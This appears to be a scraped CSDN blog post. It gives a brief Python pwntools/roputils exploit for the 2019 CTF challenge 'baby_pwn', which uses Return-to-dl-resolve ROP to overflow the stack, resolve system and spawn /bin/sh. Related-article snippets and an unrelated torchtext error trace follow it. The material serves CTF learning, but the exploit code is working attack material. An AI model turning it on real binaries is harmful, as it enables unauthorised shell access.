Return-to-dl-resolve

最新推荐文章于 2019-09-06 23:35:09 发布
最新推荐文章于 2019-09-06 23:35:09 发布
阅读量270 收藏 1
点赞数 1
CC 4.0 BY-SA版权
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_44113469/article/details/89508129
本文详细介绍了Return-to-dl-resolve这一高级ROP技术在CTF比赛中的具体实现。通过实例演示了如何利用该技术进行攻击,包括使用ROP库构造payload,调用dl_resolve进行动态链接解析,最终实现对目标系统的控制。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Return-to-dl-resolve是CTF中的高级rop技巧

 

 

2019国赛线上 baby_pwn

exp
 

import sys
import roputils
from pwn import *

context.log_level = 'debug'
#r = process("./pwn")
p = process("./babypwn")

rop = roputils.ROP('./babypwn')
addr_bss = rop.section('.bss')

offset = 0x2c
buf = rop.retfill(offset)
buf += rop.call('read', 0, addr_bss, 100)
buf += rop.dl_resolve_call(addr_bss+20, addr_bss)

p.send(p32(len(buf)) + buf)
print "[+] read: %r" % p.read(len(buf))

buf = rop.string('/bin/sh')
buf += rop.fill(20, buf)
buf += rop.dl_resolve_data(addr_bss+20, 'system')
buf += rop.fill(100, buf)

p.send(buf)
p.interactive()

 

 

栈溢出利用之return to dl-resolve实例
M021的专栏
10-07 3589
最近学习了一下漏洞原理与利用,学习到栈溢出漏洞利用的一些技巧,记录下自己的学习心得。关于return to dl-resolve的原理,网上有许多的文章已经写的很清楚了,就不赘述。本文主要是根据return to dl-resolve的原理,实现32位和64位环境下的漏洞利用。
栈溢出利用之Return to dl-resolve
hl1293348082的专栏
04-09 274
0x00 前言 在CTF中一般的栈溢出题目会给出程序对应的libc,这样我们在泄漏一个libc地址之后就能根据偏移量去计算libc的其他地址,比如system、/bin/sh或是libc基址。 那如果题目中没有给出libc,我们就无法得知题目所用的libc版本。这个时候如果我们要计算system函数的地址的话,可以利用泄露出的libc地址去http://libcdb.com搜索对应的libc版本,因为一个libc函数地址的低三位在对应的libc版本中总是不变的。(当然你也可能搜不到) 今天要介绍的这项技术
Return-to-dl-resolve浅析
weixin_30338743的博客
05-05 182
本文介绍一种CTF中的高级rop技巧-Return-to-dl-resolve,不久前的0CTF中的babystack和blackhole就用到了这个技巧。 预备知识 在开始本文前希望大家能预先了解一下什么叫延迟绑定 好了,我们开始 假设存在以下程序: //gcc x86.c -fno-stack-protector -m32 -o x86 #include <unistd.h> #i...
从0ctf2018 babystack学习return to dl-resolve
极目楚天舒的博客
05-06 1906
0x01程序分析首先查看main函数,比较简单,调用了alarm和sub_80483B,进入sub_80483B看看。sub_80483B的作用是读取0x40个字节到ebp-40处,这里显然存在栈溢出漏洞。发现只开了一个栈不可执行,于是想构造rop链。但是整个文件搜索下来也没有发现什么有价值的gadget。0x02  return to dl-resolve知识学习玩过pwn的赛棍都知道,pwn题...
栈溢出利用之return to dl-resolve payload 构造原理(二)
M021的专栏
11-03 2192
return to dl-resolve payload构造原理
基于符号执行的Return_to_省略_esolve利用代码自动生成方法_方皓1
08-03
【标题】: "基于符号执行的Return-to-dl-resolve利用代码自动生成方法_方皓1" 【描述】: "Return-to-dl-resolve是一种通用的漏洞利用技术,能够突破复杂的防护机制,目前主要依赖手工实现,需要研究人员深入理解ELF...
栈溢出利用之return to dl-resolve payload 构造原理(一)
M021的专栏
11-02 3409
前段时间,学习了return to dl-resolve 方法,并且分别在32位应用和64位应用上实践了一番,现记录下我的学习心得。
linux 栈溢出学习之return_to_dl-resolve
jmp esp
12-16 1352
符号动态解析原理符号解析一个可执行文件可能会包含外部符号,可以简单的理解为包含“库函数”。这些函数(符号),在运行的时候必须得知道他们的地址,一个可执行文件在装载的时候,即使其本身装载的位置是固定的,其“库函数”所在的文件的装载位置是不定的,但是又必须知道其精确地址才可以进行运行。所以,符号解析,即将外部符号的具体地址找到,包含两种方法: 静态解析:在编译之后的链接过程中,将外部符号所在的共享库的整
oj.xctf.org.cn ctf平台的可供练习的题库
如梦山河
10-29 2121
链接地址是:http://oj.xctf.org.cn 平台会给我一些题库的链接,根据题库IP进行1-65535的端口扫描,会发现一些其他题 http://202.112.51.184:10085 http://202.112.51.184:10093 http://202.112.51.184:13080 http://202.112.51.184:15080 http://202.112...
绿盟杯NSCTF(CCTF)2017 pwn writeup
jmp esp
07-22 6233
前言比赛有无数值得吐槽的地方,其中最主要的是,题目给了pwn的libc,然而,特么是错的,也就是说虽然给了libc,但是其实还是靠运气/当做没有libc解,顺手记录一下这两个水题。pwn1分析mainint __cdecl main() { alarm(0x1u); setbuf(stdin, 0); setbuf(stdout, 0); setbuf(stderr, 0); p
pwn学习系列--任务4 pwn200
weixin_44113469的博客
02-11 948
栈溢出之pwn200解题步骤 主要涉及到Ret2libc–修改返回地址,让其指向内存中已有的某个函数,还涉及到简单的rop( Return Oriented Programming )构造 思路分析:有read函数,变量buf大小为0x68,read可写入0x100,可知有栈溢出。题目中只给出system函数,没有给出“/bin/sh”,所以要自己通过read函数写入“/bin/sh”,然后返回调...
[pwn]堆:Use After Free
Breeze的博客
09-06 8694
Use After Free:time_formatter writeup UAF漏洞就是Use After Free,再释放后继续使用,Use After Free会引发各种奇怪的现象,根据场景的不同并没有一种统一的利用方式。下面看题目:time_formatter 日常惯例,先查看安全策略: 开启了canary、NX、ASLR,然后查看一下程序逻辑: 很常见的堆菜单,下面查看一下各种功能:...
pwn学习之dl_resolve学习篇
04-28 370
一:首先来了解一下linux下常见的攻击缓解机制: CANARY:(金丝雀值,指的是矿工曾利用金丝雀来确认是否有气体泄漏,如果金丝雀因为气体泄漏而中毒死亡,可以给矿工预警),类似于windows GS技术,当栈溢出发生时,canary值将在已保存的指令指针被重写前先改变。系统检测这个值是否改变,栈溢出发生了,保存的指令指针可能也被修改了,因此不能安全返回,函数...
xctf 攻防世界-forgot writeup
qq_43189757的博客
07-08 1845
根据ida反汇编的结果可以发现有两处溢出点,第一处溢出点没什么作用,只能观察第二处溢出点 可以观察到箭头处是个函数指针,&v3 是v3在栈上的地址,&v3 + --v14 是根据&v3在栈上移动,上面的for循环是用来改变v14的值,根据溢出点函数指针v3到v12 ,变量v14都可以被我们控制,接下来再找找有没有system函数 发现目标函数,接下来我的想法是利用缓冲...
2019XCTF攻防世界之萌新入坑(time_formatter)
weixin_44113469的博客
04-11 2008
time_formatter
2019西湖论剑writeup
weixin_44113469的博客
04-07 1913
pwn 0x01 story 保护 开启了NX,canary 题目分析 明显的格式化字符漏洞,用来泄露canary的值,直观思路 v1控制写入s的数量,可以控制v1使s溢出,控制ret返回puts,泄露某个函数地址,计算出libc基址,算出system,str_bin_sh。再次溢出,getshell。 # -*- coding:utf-8 -*- from pwn import *...
2019XCTF攻防世界之萌新入坑
weixin_44113469的博客
04-06 1706
XCTF攻防世界的题质量确实很高,还有解题思路和writeup,真是棒极了。 萌新入坑 0x01 babystack 保护机制 题目开启了nx,canary 题目代码 思路分析 ①这道题主要是绕过canary,然后栈溢出getshell。 ②经分析,read函数读入到s处,可以溢出。 ③put函数输出s的内容,遇到’\x00’才停止,即使字符串中存在’\n’,也会继续输出,用...
--------------------------------------------------------------------------- OSError Traceback (most recent call last) Cell In[56], line 1 ----> 1 import torchtext 2 print(torchtext.__version__) File c:\Users\Administrator\AppData\Local\Programs\Python\Python310\lib\site-packages\torchtext\__init__.py:18 15 _WARN = False 17 # the following import has to happen first in order to load the torchtext C++ library ---> 18 from torchtext import _extension # noqa: F401 20 _TEXT_BUCKET = "https://download.pytorch.org/models/text/" 22 _CACHE_DIR = os.path.expanduser(os.path.join(_get_torch_home(), "text")) File c:\Users\Administrator\AppData\Local\Programs\Python\Python310\lib\site-packages\torchtext\_extension.py:64 59 # This import is for initializing the methods registered via PyBind11 60 # This has to happen after the base library is loaded 61 from torchtext import _torchtext # noqa ---> 64 _init_extension() File c:\Users\Administrator\AppData\Local\Programs\Python\Python310\lib\site-packages\torchtext\_extension.py:58, in _init_extension() 55 if not _mod_utils.is_module_available("torchtext._torchtext"): 56 raise ImportError("torchtext C++ Extension is not found.") ---> 58 _load_lib("libtorchtext") 59 # This import is for initializing the methods registered via PyBind11 60 # This has to happen after the base library is loaded 61 from torchtext import _torchtext File c:\Users\Administrator\AppData\Local\Programs\Python\Python310\lib\site-packages\torchtext\_extension.py:50, in _load_lib(lib) 48 if not path.exists(): 49 return False ---> 50 torch.ops.load_library(path) 51 return True File c:\Users\Administrator\AppData\Local\Programs\Python\Python310\lib\site-packages\torch\_ops.py:1392, in _Ops.load_library(self, path) 1387 path = _utils_internal.resolve_library_path(path) 1388 with dl_open_guard(): 1389 # Import the shared library into the process, thus running its 1390 # static (global) initialization code in order to register custom 1391 # operators with the JIT. -> 1392 ctypes.CDLL(path) 1393 self.loaded_libraries.add(path) File c:\Users\Administrator\AppData\Local\Programs\Python\Python310\lib\ctypes\__init__.py:374, in CDLL.__init__(self, name, mode, handle, use_errno, use_last_error, winmode) 371 self._FuncPtr = _FuncPtr 373 if handle is None: --> 374 self._handle = _dlopen(self._name, mode) 375 else: 376 self._handle = handle 已经安装了torchtext 但是导入时报错:Error: [WinError 127] 找不到指定的程序。
最新发布
06-15
我们面对的问题是:在Windows系统上导入torchtext时出现OSError:[WinError127]找不到指定的程序。根据引用[4][5],这通常是由于torch和torchtext版本不兼容,或者环境配置问题(如缺少依赖、权限问题)导致的。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值